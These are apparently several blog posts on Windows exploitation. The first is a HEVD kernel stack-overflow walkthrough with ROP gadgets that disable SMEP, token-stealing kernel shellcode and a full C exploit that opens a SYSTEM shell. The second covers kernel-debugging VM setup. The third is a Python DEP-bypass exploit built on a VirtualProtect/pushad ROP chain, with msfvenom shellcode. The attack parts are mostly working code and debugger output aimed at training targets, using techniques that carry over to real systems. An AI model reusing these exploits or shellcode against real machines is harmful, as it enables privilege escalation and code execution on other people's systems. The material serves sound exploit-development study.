fffff805`7d3e6673 4c8bc6          mov     r8,rsi
fffff805`7d3e6676 488bd7          mov     rdx,rdi
fffff805`7d3e6679 488d4c2420      lea     rcx,[rsp+20h]
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
...

We can see that the memmove we saw in IDA is actually a memcpy. Let’s break there.

Breakpoint 1 hit
HEVD!TriggerBufferOverflowStack+0xca:
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
1: kd> r
rax=0000000000000000 rbx=0000000000000000 rcx=ffffc88ab6420f60
rdx=0000022b3e180000 rsi=0000000000000200 rdi=0000022b3e180000
rip=fffff8057d3e667e rsp=ffffc88ab6420f40 rbp=ffffdb899c235c40
 r8=0000000000000200  r9=000000000000004d r10=0000000000000000
...

On x64, arguments to functions are passed in RCX, RDX, R8 & R9. Any additional arguments will be placed on the stack. We can see that RCX is a kernel address and therefore likely the target kernel buffer. RDX is a user-mode address and contains our input buffer. R8 contains the length, here 512.

1: kd> dq rcx L4
ffffc88a`b6420f60  00000000`00000000 00000000`00000000
ffffc88a`b6420f70  00000000`00000000 00000000`00000000
1: kd> dq rdx L4
0000022b`3e180000  41414141`41414141 41414141`41414141
0000022b`3e180010  41414141`41414141 41414141`41414141

Let’s step over the call and observe that the kernel buffer is filled with our input.

1: kd> p
HEVD!TriggerBufferOverflowStack+0xcf:
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
1: kd> dq rcx L4
ffffc88a`b6420f60  41414141`41414141 41414141`41414141
ffffc88a`b6420f70  41414141`41414141 41414141`41414141

Now let’s see what happens when we extend the length of our input buffer:

...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlFillMemory(uBuffer, 2500, 'A');
DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);
...

If we break again but this time run until the function returns, we can see that the return address has been overwritten:

Breakpoint 1 hit
HEVD!TriggerBufferOverflowStack+0xca:
fffff805`7d3e667e e83dabf7ff      call    HEVD!memcpy (fffff805`7d3611c0)
1: kd> p
HEVD!TriggerBufferOverflowStack+0xcf:
fffff805`7d3e6683 eb1b            jmp     HEVD!TriggerBufferOverflowStack+0xec (fffff805`7d3e66a0)
1: kd> pt
HEVD!TriggerBufferOverflowStack+0x10b:
fffff805`7d3e66bf c3              ret
1: kd> dq rsp
ffffc88a`b4a21778  41414141`41414141 41414141`41414141
ffffc88a`b4a21788  41414141`41414141 41414141`41414141
1: kd> g
Access violation - code c0000005 (!!! second chance !!!)
HEVD!TriggerBufferOverflowStack+0x10b:
fffff805`7d3e66bf c3              ret

We can see that the return address was overwritten with our input “A”s. At this point, we confirmed the vulnerability & can trigger a crash.

Exploitation

Now that we can crash it with a large input buffer, the next step is figuring out the exact offset at which we overwrite RIP. We can generate a pattern with msf, send it, and then inspect RSP on the ret:

msf-pattern_create -l 2500
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8...
...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
const char* pattern = { "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8..."};
RtlCopyMemory(uBuffer, pattern, 2500);
DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);
...
HEVD!TriggerBufferOverflowStack+0x10b:
fffff800`6ebf66bf c3              ret
1: kd> dq rsp
ffffba89`e9fe9778  43327243`31724330 35724334`72433372
ffffba89`e9fe9788  72433772`43367243 43307343`39724338
msf-pattern_offset -q 43327243 -l 2500
[*] Exact match at offset 2076

After sending the pattern and letting it run, we can see that we got our access violation again and inspecting RSP allowed us to find the offset: 2076. At this point, we could allocate shellcode and try to jump to it. Note that the offset is slightly off – if you debug it you will see that only the 2nd half of the shellcode address ends up at the correct position – in the following snippet, I account for that (real offset being 2076-4).

...
LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
LPVOID shellcode = VirtualAlloc(NULL, 500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlFillMemory(uBuffer, 2500, '\x41');
RtlFillMemory(shellcode, 500, '\x90');
*(QWORD*)((QWORD)uBuffer + 2072) = (QWORD)shellcode;
...
0: kd> ba e1 HEVD!TriggerBufferOverflowStack+0x10b
0: kd> g
Breakpoint 0 hit
HEVD!TriggerBufferOverflowStack+0x10b:
fffff802`a74966bf c3              ret
1: kd> dq rsp
fffffa8a`25b72778  00000173`3c510000 41414141`41414141
fffffa8a`25b72788  41414141`41414141 41414141`41414141
1: kd> p
00000173`3c510000 90              nop
1: kd> p
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000fc

After trying to execute one of the NOPs we get an error. We can get some additional information with the analyze extension:

!analyze -v
...
ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY (fc)

This is SMEP (Supervisor Mode Execution Prevention) kicking in. The kernel is not allowed to execute code at the user-mode address we provided and can therefore not just execute our shellcode. In order to bypass SMEP, we have to find a way to either disable it or make it “think” we are not a user-mode page. For this introductory exploit, I’ll just show the bypass method.

SMEP is controlled by the 20th bit in the CR4 Register.

If we can somehow change that bit, we can disable it & still jump to our shellcode and execute it. While we can not execute shellcode, we can use ROP to flip that bit. To do that, we need to first look for gadgets we can use inside the driver or kernel. The kernel is a much better source of gadgets due to its size. I’m a big fan of ropper so I’m going to copy ntoskrnl.exe from the Debuggee VM to my Kali VM.

ropper --file ntoskrnl.exe --console
(ntoskrnl.exe/PE/x86_64)> search %cr4%
0x00000001403acd47: mov cr4, rcx; ret;
(ntoskrnl.exe/PE/x86_64)> search pop rcx
0x000000014020a386: pop rcx; ret;

We identified 2 gadgets we can use, POP RCX to get a value with its 20th bit set to zero into RCX and MOV CR4, RCX to get that value into CR4. It’s usually a good idea to get the “old” value of CR4 and then modify it. For simplicity, we are just going to observe what it looks like in the debugger when we execute our exploit and then hardcode it here.

Before adding the ROP chain to our exploit we have to think about ASLR. Ropper shows relative addresses so we need to find the load address of the kernel. Fortunately, this is very easy from a medium integrity shell as there is an API that allows to obtain it:

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

With the base address, we can now add the gadget offsets to obtain a proper ROP chain. We update our exploit with this chain & a dummy value for CR4:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
	printf("[>] NTBase: %llx\n", ntBase);
	QWORD POP_RCX = ntBase + 0x3acd47;
	QWORD MOV_CR4_RCX = ntBase + 0x20a386;
	int index = 0;

	LPVOID uBuffer = VirtualAlloc(NULL, 2500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	LPVOID shellcode = VirtualAlloc(NULL, 500, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, 2500, '\x41');
	RtlFillMemory(shellcode, 500, '\x90');

	QWORD* rop = (QWORD*)((QWORD)uBuffer + 2072);
	
	*(rop + index++) = POP_RCX;
	*(rop + index++) = 0x0;
	*(rop + index++) = MOV_CR4_RCX;
	*(rop + index++) = (QWORD)shellcode;

	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, 2500, NULL, 0, NULL, NULL);

}

We run it with a breakpoint on the overwritten return address:

HEVD!TriggerBufferOverflowStack+0x10b:
fffff804`5e6f66bf c3              ret
0: kd> dq rsp
fffff088`b0910778  fffff804`3640a386 00000000`00000000
fffff088`b0910788  fffff804`365acd47 0000016d`86580000
fffff088`b0910798  41414141`41414141 41414141`41414141
fffff088`b09107a8  41414141`41414141 41414141`41414141
fffff088`b09107b8  41414141`41414141 41414141`41414141
fffff088`b09107c8  41414141`41414141 41414141`41414141
fffff088`b09107d8  41414141`41414141 41414141`41414141
fffff088`b09107e8  41414141`41414141 41414141`41414141
0: kd> p
nt!HalSendNMI+0x276:
fffff804`3640a386 59              pop     rcx
1: kd> p
nt!HalSendNMI+0x277:
fffff804`3640a387 c3              ret
1: kd> 
nt!KeFlushCurrentTbImmediately+0x17:
fffff804`365acd47 0f22e1          mov     cr4,rcx
1: kd> 
Unknown exception - code c0000096 (!!! second chance !!!)
nt!KeFlushCurrentTbImmediately+0x17:
fffff804`365acd47 0f22e1          mov     cr4,rcx

We get an exception – it does not allow us to write cr4 with zero. Let’s inspect its current value:

1: kd> r cr4
cr4=0000000000350ef8

We can hardcode the value and flip the 20th bit, then try again:

*(rop + index++) = 0x350ef8 ^ 1UL << 20;
1: kd> 
nt!KeFlushCurrentTbImmediately+0x17:
fffff800`737acd47 0f22e1          mov     cr4,rcx
1: kd> r rcx
rcx=0000000000250ef8
1: kd> p
nt!KeFlushCurrentTbImmediately+0x1a:
fffff800`737acd4a c3              ret
1: kd> p
0000026a`93680000 90              nop
1: kd> 
0000026a`93680001 90              nop
1: kd> 
0000026a`93680002 90              nop

We can see that by setting a value that makes more sense we can disable SMEP & execute our NOPs! Now we need kernel shellcode that will somehow let us elevate privileges without causing a BSOD.

Kernel Shellcode

For this exploit, we are going to go with a simple token stealing payload. Every process has a token associated that defines its privileges. A pointer to this token is saved in the EPROCESS structure:

0: kd> dt nt!_EPROCESS
...
+0x440 UniqueProcessId      : Ptr64 Void
+0x448 ActiveProcessLinks   : _LIST_ENTRY
...
+0x4b8 Token                : _EX_FAST_REF
...

If we can read this pointer & copy it over the one from our process, we get full SYSTEM privileges. Essentially the shellcode will find our EPROCESS and save a pointer to it. Then it will walk ActiveProcessLinks (which is a linked list of processes) until it finds a SYSTEM process and copies the token pointer from that one over the one from our process.

[BITS 64]
start:
  mov rax, [gs:0x188]       ; KPCRB.CurrentThread (_KTHREAD)
  mov rax, [rax + 0xb8]     ; APCState.Process (current _EPROCESS)
  mov r8, rax               ; Store current _EPROCESS ptr in RBX

loop:
  mov r8, [r8 + 0x448]      ; ActiveProcessLinks
  sub r8, 0x448             ; Go back to start of _EPROCESS
  mov r9, [r8 + 0x440]      ; UniqueProcessId (PID)
  cmp r9, 4                 ; SYSTEM PID? 
  jnz loop                  ; Loop until PID == 4

replace:
  mov r9, [r8 + 0x4b8]      ; Get SYSTEM token
  and r9, 0xf0              ; Clear low 4 bits of _EX_FAST_REF structure
  mov [rax + 0x4b8], r9     ; Copy SYSTEM token to current process
  
  xor rax, rax
  ret

Note that depending on which operating system you are targeting these offsets will change and you have to find them via WinDBG. To compile the shellcode, we can use NASM/radare2:

nasm shellcode.asm -o shellcode.bin -f bin
radare2 -b 32 -c 'pc' ./shellcode.bin
#define _BUFFER_SIZE 256
const uint8_t buffer[_BUFFER_SIZE] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  ...
};

While this will work fine and replace the token – we are still in an IOCTL and have messed with the stack. Just returning from here will cause a BSOD. There are at least 2 possibilities here – either we figure out how to restore the stack to the point where we can return somewhere that will not crash or use a generic way to avoid crashes.

For this post we choose the generic way by Kristal and append our shellcode:

[BITS 64]
start:
  mov rax, [gs:0x188]       ; KPCRB.CurrentThread (_KTHREAD)
  mov rax, [rax + 0xb8]     ; APCState.Process (current _EPROCESS)
  mov r8, rax               ; Store current _EPROCESS ptr in RBX

loop:
  mov r8, [r8 + 0x448]      ; ActiveProcessLinks
  sub r8, 0x448             ; Go back to start of _EPROCESS
  mov r9, [r8 + 0x440]      ; UniqueProcessId (PID)
  cmp r9, 4                 ; SYSTEM PID? 
  jnz loop                  ; Loop until PID == 4

replace:
  mov rcx, [r8 + 0x4b8]      ; Get SYSTEM token
  and cl, 0xf0               ; Clear low 4 bits of _EX_FAST_REF structure
  mov [rax + 0x4b8], rcx     ; Copy SYSTEM token to current process

cleanup:
  mov rax, [gs:0x188]       ; _KPCR.Prcb.CurrentThread
  mov cx, [rax + 0x1e4]     ; KTHREAD.KernelApcDisable
  inc cx
  mov [rax + 0x1e4], cx
  mov rdx, [rax + 0x90]     ; ETHREAD.TrapFrame
  mov rcx, [rdx + 0x168]    ; ETHREAD.TrapFrame.Rip
  mov r11, [rdx + 0x178]    ; ETHREAD.TrapFrame.EFlags
  mov rsp, [rdx + 0x180]    ; ETHREAD.TrapFrame.Rsp
  mov rbp, [rdx + 0x158]    ; ETHREAD.TrapFrame.Rbp
  xor eax, eax  ;
  swapgs
  o64 sysret  

This makes our full exploit:

#include <stdio.h>
#include <Windows.h>
#include <winternl.h>
#include <Psapi.h>

#define QWORD ULONGLONG

BYTE sc[256] = {
  0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
  0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
  0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
  0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
  0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
  0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
  0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
  0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
  0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
  0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
  0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
  0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
  0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};

QWORD getBaseAddr(LPCWSTR drvName) {
	LPVOID drivers[512];
	DWORD cbNeeded;
	int nDrivers, i = 0;
	if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
		WCHAR szDrivers[512];
		nDrivers = cbNeeded / sizeof(drivers[0]);
		for (i = 0; i < nDrivers; i++) {
			if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
				if (wcscmp(szDrivers, drvName) == 0) {
					return (QWORD)drivers[i];
				}
			}
		}
	}
	return 0;
}

int main()
{
	HANDLE hDriver = CreateFile(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
	if (hDriver == INVALID_HANDLE_VALUE)
	{
		printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
		exit(1);
	}

	QWORD ntBase = getBaseAddr(L"ntoskrnl.exe");
	printf("[>] NTBase: %llx\n", ntBase);
	QWORD POP_RCX = ntBase + 0x20a386;
	QWORD MOV_CR4_RCX = ntBase + 0x3acd47; 

	int index = 0;
	int bufSize = 2072 + 4 * 8;

	LPVOID uBuffer = VirtualAlloc(NULL, bufSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	LPVOID shellcode = VirtualAlloc(NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	RtlFillMemory(uBuffer, bufSize, '\x41');
	RtlCopyMemory(shellcode, sc, 256);

	QWORD* rop = (QWORD*)((QWORD)uBuffer + 2072);
	
	*(rop + index++) = POP_RCX;
	*(rop + index++) = 0x350ef8 ^ 1UL << 20;
	*(rop + index++) = MOV_CR4_RCX;
	*(rop + index++) = (QWORD)shellcode;

	DeviceIoControl(hDriver, 0x222003, (LPVOID)uBuffer, bufSize, NULL, 0, NULL, NULL);
	
	printf("[>] Enjoy your shell!\n", ntBase);
	system("cmd");
    return 0;
}

Running the exploit results in a SYSTEM shell on the target:

The post Windows Kernel Exploitation – HEVD x64 Stack Overflow appeared first on Vulndev.

Windows Kernel Exploitation – VM Setup

By: xct
1 July 2022 at 09:43

In this series about Windows kernel exploitation, we will explore various kernel exploit techniques & targets. This topic is mainly something I studied to prepare for AWE. This short first part will deal with the VM setup for the rest of the series. I can not offer downloadable VMs so you will have to follow the steps outlined here to get a comparable environment.

OS Setup

We will use Windows 11 for both the debugger and the debugger and everything will be running on VMware Workstation 16. To allow the installation of Windows 11 on VMWare, we will have to encrypt the VM:

Then we add a TPM:

If you don’t have a Windows 11 ISO you can get a version here. Note that using Insider Preview is not a good idea since the symbols are not always fully available. After the installation is completed & all updates are installed, create a low-privileged user called user:

net user user user /add

We also want to disable the Windows Update Service (we don’t want gadgets to change because windows updates). Now we continue to install tools we will need later on.

WinDbgX

WindbgX (or Preview) can be installed for free from the Microsoft Store. We are not using python/mona so we won’t install it. After installing, start it once and set the symbol path in File->Settings->Debugging Settings to srv*c:\symbols*http://msdl.microsoft.com/download/symbols.

Other Tools

Other tools we install/download on this VM are Visual Studio, Visual Studio Code, rp++, Ida Free.

Duplicating the VM

After preparing our VM, we need to clone it (Right-Click on VM->Manage->Clone) in order to get a Debugger & Debuggee VM.

At this point, you should have 2 identical VMs. On older versions of windows, we would have to modify the .vmx files in order to allow debugging via serial port – as this is all Windows 10+ we can, however, debug everything nicely via TCP/IP.

Setting up Kernel Debugging

First, we set up proper networking. In my case both VMs have a NAT adapter for internet access & an additional adapter to communicate (VMNET-X):

  • Debugger VM: 172.16.0.100
  • Debuggee VM: 172.16.0.101

On the debuggee VM:

bcdedit /debug on
bcdedit /dbgsettings net hostip:172.16.0.100 port:50000 key:1.2.3.4

On the debugger VM we just have to start WinDbgX and attach it to the kernel:

After a restart of the debuggee WinDbgX automatically attaches and breaks for us:

Connected to Windows 10 22000 x64 target at (Fri Jul  1 02:29:02.526 2022 (UTC - 7:00)), ptr64 TRUE
Kernel Debugger connection established.
Symbol search path is: srv*
Executable search path is: 
Windows 10 Kernel Version 22000 MP (1 procs) Free x64
Edition build lab: 22000.1.amd64fre.co_release.210604-1628
Machine Name:
Kernel base = 0xfffff804`27000000 PsLoadedModuleList = 0xfffff804`27c29650
System Uptime: 0 days 0:00:02.213
KDTARGET: Refreshing KD connection


We continue with g and continue the startup. At this point our setup is complete and we create a snapshot on both VMs (with the debugger running). Finally to make sure everything is working we start notepad.exe on the debuggee VM & then see if we can debug it:

!dml_proc
...
ffff9485`c0f26080 23c8 Notepad.exe  
...
.process /i ffff9485c0f26080 Notepad.exe
g
!process
PROCESS ffff9485c0f26080
    SessionId: 1  Cid: 23c8    Peb: 5fab251000  ParentCid: 10ec
    DirBase: 1aec4a000  ObjectTable: ffffa80fb00d0800  HandleCount: 257.
    Image: Notepad.exe

At this point, everything is working as expected and we can start looking at exploitation in the next post.

Note that under normal circumstances you can not load any unsigned drivers like HEVD on windows 11 – however when a kernel debugger is attached, this is not true anymore.

The post Windows Kernel Exploitation – VM Setup appeared first on Vulndev.

Bypassing DEP with VirtualProtect (x86)

By: xct
14 June 2022 at 18:46

In the last post we explored how to exploit the rainbow2.exe binary from the vulnbins repository using WriteProcessMemory & the “skeleton” method. Now we are going to explore how to use VirtualProtect and instead of setting up the arguments on the stack with dummy values and then replacing them, we are going to use the pushad instruction to push alle registers on the stack & then execute our function.

We start from the following exploit template:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

p = remote('192.168.153.212',2121, typ='tcp', level='debug')
p.sendline(b"LST |%p|%p|%p|%p|")
leak = p.recvline(keepends=False).split(b"|")[1:]
binary_leak = int(leak[1].decode(),16)
binary_base = binary_leak - 0x14120;
log.info("Binary base: "+hex(binary_base))

rop_gadgets = [
      0xdeadc0de,
]

rop = b""
rop += p32(binary_base + 0x159d)*(32) # ropnop
for g in rop_gadgets:
      rop += p32(g)

log.info("Sending payload..")
buf  = b""
buf += b"LST "
buf += rop
buf += b"A" * (offset-len(rop))
buf += b"B" * 4 
buf += p32(binary_base + 0x11396)
buf += b"D" * (size-len(buf))
p.sendline(buf)
input("Press enter to continue..")
p.close() 
0:003> `p
deadc0de ??              ???

As before, we are going to use a stack pivot to land in our input buffer and execute a rop chain which just consists of a dummy instruction at this point. Let’s explore how pushad works: Pushes the following registers in the following order onto the stack: EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI (https://c9x.me/x86/html/file_module_x86_id_270.html) .

We also need to know what arguments VirtualProtect expects:

BOOL VirtualProtect(
  [in]  LPVOID lpAddress,
  [in]  SIZE_T dwSize,
  [in]  DWORD  flNewProtect,
  [out] PDWORD lpflOldProtect
);

The first argument lpAddress is the address at which we want to change memory protections, dwSize is giving the size, flNewProtect is a mask for the new protections we want (0x40 = PAGE_EXECUTE_READWRITE) and lpflOldProtect must be a writeable address so the old protections can be stored. If we look at the order pushad places the values on the stack, we should setup the registers as follows (which will end up on the stack exactly in the order below but in reverse, e.g. ropnop being the first gadget):

# Registers
EAX 90909090  => Shellcode                                               
ECX &writable => lpflOldProtect                                
EDX 00000040  => flNewProtect                                   
EBX 00000501  => dwSize                                           
ESP ????????  => lpAddress (ESP)                         
EBP ????????  => Redirect control fow to ESP              
ESI ????????  => &VirtualProtect
EDI ????????  => RopNop

Setting those registers up correctly requires some planning – as soon as you are done setting up one of them you can not use it anymore to setup the other registers. That’s why we have to setup the more commonly used registers at the end.

We start by setting up ebx. Note that in order to get 0x501 into the register without having null bytes we could use a add, DWORD instruction and calculate the difference. In this case there is add eax,5D40C033;. If we calculate ? 0x501 - 0x5d40c033 = a2bf44ce we get the value we have to put into that register to end up with the value we want.

# EBX
# Blocked: None
0x4CBFB + binary_base,  # pop eax; ret;
0xa2bf44ce,             # put delta into eax (goal: 0x00000201 into ebx)
0x7720E + binary_base,  # add eax,5D40C033; ret;
0x3AE24 + binary_base,  # xchg eax, ebx; ret;

Now we setup edx. We use the same trick again to get the null byte free value of 0x40 into the register.

# EDX
# Blocked: EBX
0x4CBD7 + binary_base,  # pop eax; ret;
0xa2a7fdd6,             # put delta into eax (goal: 0x00000040 into edx)
0x76EFF + binary_base,  # add eax, 0x5D58026A       
0x1ABA5 + binary_base,  # xchg eax, edx; dec eax; add al, byte ptr [eax]; pop ecx; ret;
0x41414141,             # dummy

We continue by setting ecx. Since this needs a writable address we get one via WinDBG as described in the other post and just pop the value into the register.

# ECX
# Blocked: EBX, EDX
0x72D31 + binary_base,  # pop ecx; ret;
0xA635A + binary_base,  # &writable location

For edi, we set the address of a ropnop gadget directly via pop:

# EDI
# Blocked: EBX, EDX, ECX
0x32301 + binary_base,  # pop edi; ret;
0x774C7 + binary_base,  # ropnop

We set esi by popping the address of a jmp eax gadget. Normally this would hold the address of VirtualProtect but we will store VirtualProtect at the very end in eax – so placing jmp eax here will achieve the same.

# ESI
# Blocked EBX, EDX, ECX, EDI
0x24261 + binary_base,  # pop esi; ret;      
0x14AF9 + binary_base,  # jmp eax (just stored, not executed right away)

Finally we set up eax with the address of VirtualProtect. This is a bit tricky because we do not have a leak in kernel32 and the binary does not use VirtualProtect itself. We can however just as in the other post get the address of another kernel32 function from the IAT and then subtract the offset.

0:001> ?kernel32!WriteFile - kernel32!VirtualProtectStub
Evaluate expression: 12528 = 000030f0
# EAX
# Blocked EBX, EDX, ECX, EDI, ESI
0x704F4 + binary_base,  # pop eax; ret;
0x9015C + binary_base,  # IAT WriteFile
0x2BB8E + binary_base,  # mov eax, dword ptr [eax] / dereference IAT to get kernel32 ptr
0x113AB + binary_base,  # sub eax,1000 
0x113AB + binary_base,  # sub eax,1000 
0x113AB + binary_base,  # sub eax,1000 
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x41414141,
0x4d1ed + binary_base,  # sub eax, 0x30 ; pop ebp ; ret;
0x7D695 + binary_base,  # pop ebp dummy 

0x752EC + binary_base,  # pushad
0x11394 + binary_base,  # jmp esp

At this point we can call the pushad instruction to put everything on the stack which then looks as follows:

0x752EC + binary_base,  # pushad
0x11394 + binary_base,  # jmp esp
eax=76c304c0 ebx=00000501 ecx=3fb5635a edx=00000040 esi=3fac4af9 edi=3fb274c7
eip=3fb252ec esp=0151f790 ebp=3fb2d695

0:003> dd /c1 esp
0151f790  3fb274c7 # ropnop
0151f794  3fac4af9 # jmp eax (eax=&VirtualProtect)
0151f798  3fb2d695 # pop ebp (pops 76c304c0)
0151f79c  0151f7b0 # ptr sc  ----
0151f7a0  00000501               |
0151f7a4  00000040               |
0151f7a8  3fb5635a               |
0151f7ac  76c304c0               |
0151f7b0  3fac1394 # jmp esp     |
0151f7b4  90909090  <------------
...

At this point we can execute our shellcode and get our calc. The full exploit can be found below:

#!/usr/bin/env python3
from pwn import *

offset = 1032
size = 4000

sc =  b""
sc += b"\x90"*0x10
# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v sc -b '\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x20\x2f\x5C'
sc += b"\x29\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
sc += b"\x76\x0e\xad\x9c\x2a\x96\x83\xee\xfc\xe2\xf4\x51\x74"
sc += b"\xa8\x96\xad\x9c\x4a\x1f\x48\xad\xea\xf2\x26\xcc\x1a"
sc += b"\x1d\xff\x90\xa1\xc4\xb9\x17\x58\xbe\xa2\x2b\x60\xb0"
sc += b"\x9c\x63\x86\xaa\xcc\xe0\x28\xba\x8d\x5d\xe5\x9b\xac"
sc += b"\x5b\xc8\x64\xff\xcb\xa1\xc4\xbd\x17\x60\xaa\x26\xd0"
sc += b"\x3b\xee\x4e\xd4\x2b\x47\xfc\x17\x73\xb6\xac\x4f\xa1"
sc += b"\xdf\xb5\x7f\x10\xdf\x26\xa8\xa1\x97\x7b\xad\xd5\x3a"
sc += b"\x6c\x53\x27\x97\x6a\xa4\xca\xe3\x5b\x9f\x57\x6e\x96"
sc += b"\xe1\x0e\xe3\x49\xc4\xa1\xce\x89\x9d\xf9\xf0\x26\x90"
sc += b"\x61\x1d\xf5\x80\x2b\x45\x26\x98\xa1\x97\x7d\x15\x6e"
sc += b"\xb2\x89\xc7\x71\xf7\xf4\xc6\x7b\x69\x4d\xc3\x75\xcc"
sc += b"\x26\x8e\xc1\x1b\xf0\xf6\x2b\x1b\x28\x2e\x2a\x96\xad"
